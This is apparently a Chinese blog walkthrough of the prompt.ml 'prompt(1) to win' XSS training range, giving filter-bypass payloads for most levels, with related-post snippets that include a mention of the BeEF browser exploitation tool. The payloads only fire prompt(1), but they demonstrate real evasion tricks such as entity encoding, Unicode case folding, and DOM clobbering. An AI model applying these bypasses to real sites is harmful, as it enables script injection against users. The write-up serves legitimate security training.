XSS靶场(三)prompt to win

最新推荐文章于 2024-01-17 08:00:00 发布
最新推荐文章于 2024-01-17 08:00:00 发布
阅读量376 收藏 1
点赞数
分类专栏: Web攻防 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/C_LCH_2000/article/details/126052259
版权

靶场地址:prompt(1) to win - 0x0http://prompt.ml/0

0x00 

无过滤,闭合双引号及标签即可;

"><script>prompt(1)</script>//

0x01 

替换 </ 任意字符 > 为空;

用<svg标签和HTML容错机制不写 ">" ,加空格、回车、注掉即可;

<svg onload=prompt(1)//

<img src=1 onerror="prompt(1)"

 0x02

过滤了 = 和 ( ,那就不用他俩;

用JS的 eval函数加 call方法,再给( unicode为 u0028即可;

或者用svg标签 加HTML编码;

<script>eval.call`${'prompt\u00281)'}`</script>

<svg><script>prompt&#40;1)</script>

 0x03

限制了 -->让我们无法闭合;

用 --!> 闭合即可;

aaa--!>
<script>prompt(1)</script>

0x04 

这里限制src的值的开头必须为http://prompt.ml/;

可用@来重定向,但url:user:password@baidu.com中password后不能有 / ,用%2f代替;

在服务器根目录下写一个test.js,里面写个prompt(1)即可;

http://prompt.ml%2f@127.0.0.1/test.js

0x05

将 >、on.+?=、focus 字符替换为 _ ,所以过滤了js的autofocus事件以及 on开头的事件;

但没有过滤换行,可利用HTML容错机制,只要关键字和语法正确,不受空格和换行符影响的特性,再闭合前后 "" 即可;

a" type=image src=1 onerror
="prompt(1)

0x06 

这里构造了一个from表单,必须输入形如 formURL#formDataJSON这样的如:http://httpbin.org/post#{"name":"Matt"},#分割成数组,提取formURL构造form表单,"formURL"赋值给form标签中的action,method是"post",fromData[0]值 "name"赋值给name,"Matt"赋值给value;

然后过滤document.forms[0].action中的 script和data,致使javascript:prompt()不能直接使用;

但如果将name赋值为"action",则后面的action会直接覆盖前面的第一个action,即:document.form[0].action指向的就不是form标签中的action,而是name="action"中的"action",过滤也就失效了;

javascript:prompt(1)#{"action":"Matt"}

0x07 

这里定义了一个 # ,每个 #都会致使一个新 title的产生,每个 title后只显示前12个输入的字符;

用 /* */去除多余部分,逃逸长度限制 即可;

"><script>/*#*/prompt(1/*#*/)</script>

0x08

这里将 \r\n < / " 过滤,这就没法逃逸单行注释了;

但 javaScript规定有5个字符,不能在字符串中直接出现,只能使用转义形式,其二为:

  • u+2028:行分隔符
  • u+2029:段分隔符

 这东西没法直接用,得现在控制台让其生成一个特殊的payload,然后我们复制,再配合 --> 主调后面的 " 即可;

'\u2028prompt(1)\u2029-->'  //复制到控制台生成特殊payload再复制拿去用

 0x09

这里的正则匹配<a-zA-Z>,还给< 后面加上了_, 并且转大写,这几乎过滤了所有的标签;

所以要用到一个技巧:有这样一个字符 ſ ,它在转大写后会变成S;

又因为html对大小写不敏感,JS对大小写敏感,所以把prompt编码为:&#112;&#114;&#111;&#109;&#112;&#116; 即可;

<ſcript src=1 onerror=&#112;&#114;&#111;&#109;&#112;&#116;(1)></script>

<ſvg onload=&#112;&#114;&#111;&#109;&#112;&#116;(1)>

0x0A 

 encodeURIComponent() 函数可把字符串作为 URI 组件进行编码。

该方法不会对 ASCII 字母和数字进行编码,也不会对这些 ASCII 标点符号进行编码: - _ . ! ~ * ' ( ) 

其他字符(比如 :;/?:@&=+$,# 这些用于分隔 URI 组件的标点符号),都是由一个或多个十六进制的转义序列替换的。

破局点在于 ' 被替换为空,那就把 ' 插到prompt中 即可;

p'rompt(1)

 

0x0B 

过滤了一堆东西;

解法没搞懂,哈哈;

"(prompt(1))in"

0x0C

这里先过滤,后替换,所以第10题那样行不通;

用 parseInt() 函数可解析字符串并返回整数,再用toString解码即可绕过;

关于parseint()函数的理解:关于JavaScript parseInt() 函数的理解_树迷了路的博客-优快云博客

eval((630038579).toString(30))(1)

0x0D

未完成

0x0E

未完成

0x0F 

和第七题差不多,不过是过滤了/*,构造<!-- -->即可 ;

配合<svg>使注释生效即可;

关于此题中<svg>使用详解:http://t.csdn.cn/1P2Ik

"><svg><!--#--><script><!--#-->prompt(1<!--#-->)</script>

 

xss练习-prompt(1) to win
Ni9htMar3的博客
09-11 9948
链接地址: http://prompt.ml/0 规则1、成功执行prompt(1). 2、payload不需要用户交互 3、payload必须对下述浏览器有效: - Chrome(最新版) - Firefox(最新版) - IE10 及以上版本(或者IE10兼容模式)4、每个级别至少给出两种浏览器的答案 5、字符越少越好level 0function escape(input)
prompt(1)to win靶场(1~9)
newlife1441的博客
08-02 685
呼叫提示符prompt(1)获胜,你应该在没有用户交互的情况下制作它。在完成每个关卡后,你的有效载荷将等待验证并测试最新版本,Firefox(最新版本)、ie10,虽然大多数级别都有所有浏览器解决方案,但有些可能没有。可以保证每个级别至少有两个浏览器的解决方案。最后但并非最不重要的是,有效载荷需要更少的角色,下面是靶场的网址http。...
prompt(1) to win -----XSS学习笔记
热门推荐
Assassin
08-13 1万+
一直不是很懂XSS,所以这里专门来学习一下下!记录做题的过程嗯。规则是当想办法嵌入prompt(1) 就算胜利了第0关什么过滤都没有,payload如下"><script>prompt(1)</script><"第1关—<> 过滤function escape(input) { // tags stripping mechanism from ExtJS library // Ext
Prompt1to win练习
and_then111的博客
11-11 2080
Prompt1to win练习关于Prompt(1) to winLevel 0Level 1Level 2Level 3Level 4Level 5Level 6Level 7Level 8Level 9Level ALevel BLevel CLevel DLevel ELevel FHidden Level -1Hidden Level -2Hidden Level -3Hidden L...
xss绕过:prompt(1)
Miracle_ze的博客
07-30 3467
xss绕过
XSS漏洞:prompt.mi靶场通关
最新发布
qq_68163788的博客
01-17 1998
prompt.mi靶场是一个专门设计用来测试和学习跨站脚本漏洞(XSS)的在线平台。在这个靶场中,你可以通过输入恶意代码来尝试利用网站的XSS漏洞,从而获取敏感信息或执行恶意操作。通关这个靶场意味着成功利用了网站的XSS漏洞,并能够展示出如何防止这种漏洞的攻击。这个靶场对于安全研究人员和开发人员来说是一个非常有用的学习和测试工具,可以帮助他们更好地理解和防范XSS漏洞。通过这个平台,用户可以提高对XSS漏洞的认识,并学习如何更好地保护自己的网站免受此类攻击。
XSS线上靶场---prompt
qq_52016943的博客
07-30 1186
XSS prompt
XSS自动化工具——Beef
世间繁华梦一出
03-10 5818
Beef的使用一、Beef简介二、beef的下载安装、Beef配置四、Beef的使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEF) BeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1067
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第方站点 A。
CTF-WEB入门DOC-2019版1
08-03
3. XSS:学习xss-labs、xsslabs-wp、prompt 1 to win等,掌握XSS攻击和防御。 4. SSRF:参考ssrf学习记录进行深入理解。 5. PHP漏洞:学习PHP基础和相关漏洞,如变量覆盖、文件包含、反序列化、RCE等。 6. Python...
XSS小结
wkend的博客
10-19 1644
XSS是什么? XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页时触发XSS而被攻击。 XSS会造成那些危害? 攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用...
prompt(1) to win -xss学习
shinygod的博客
11-22 1076
prompt(1) to win xss 学习
【20171025中】alert(1) to win 脚本渲染自建
weixin_30896763的博客
10-25 156
游戏误人生,一下午玩了将近四个小时的国杀,后悔不已,然后重新拾起xsschallenge,突发奇想,自己构建渲染后的html。 从最简单的开始。 自动检测html: <!DOCTYPE html> <html> <head><meta http-equiv="Content-Type" content="...
XSS总结
weixin_51356351的博客
11-19 1659
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
XSS语句
weixin_66977568的博客
09-13 306
XSS语句
XSS靶场prompt.ml过关详解
m0_46467017的博客
07-30 1498
prompt.ml也是一个线上的白盒靶场,与之前的其他xss靶场相比,prompt靶场更加偏向于模拟真实环境下的代码,需要一定的代码审计能力才可以完成关卡。1、成功执行prompt(1)即可获胜,payload不需要用户交互,若成功执行,界面会显示YOUWON。2、每个payload均需要在以下浏览器测试Chrome(最新版)、Firefox(最新版)、IE103、虽然大多数级别都具有所有浏览器解决方案,但有些可能没有。确保每个级别都有至少两个浏览器的解决方案。......
XSS-labs靶场实战(一)——第1-3关
永远是少年
11-18 929
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战。 一、第一关 二、第二关 、第
XSS练习-prompt(1) to win
weixin_30387799的博客
05-17 553
第零关 Text Viewer function escape(input) { // warm up // script should be executed without user interaction return '<input type="text" value="' + input + '">'; } Answer 对输入的文本没有进行过滤措施直...
prompt(1) to win writeup
code_lab
04-05 2261
0没有任何过滤"><script>prompt(1)</script> 或者 "><svg/onload=prompt(1)>1过滤了大于号>,采用注释符//绕过aa<svg/onload=prompt(1)//2过滤了左括号(,使用<svg>标签绕过。在SVG向量里面的<script>元素(或者其他CDATA元素 ),会先进行xml解析。因此((十六进制)或者((十进制)或者
XSS靶场实践:WEB渗透学习与技能巩固
资源摘要信息:"WEB渗透学习-XSS-labs靶场" 一、XSS基础概念 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络攻击技术,攻击者通过在目标网站的页面中注入恶意脚本代码,当其他用户浏览该页面时,嵌入的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值